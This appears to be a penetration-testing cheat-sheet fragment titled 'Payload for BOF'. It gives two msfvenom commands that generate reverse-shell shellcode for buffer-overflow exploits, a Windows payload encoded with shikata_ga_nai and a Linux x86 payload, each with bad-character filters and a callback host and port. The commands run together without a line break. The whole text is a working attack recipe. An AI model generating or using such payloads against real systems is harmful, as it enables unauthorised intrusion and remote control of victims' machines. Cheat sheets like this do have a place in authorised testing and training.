Payload for BOF
Windows
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -b "\x00\x20" -f py -v shellcodeLast updated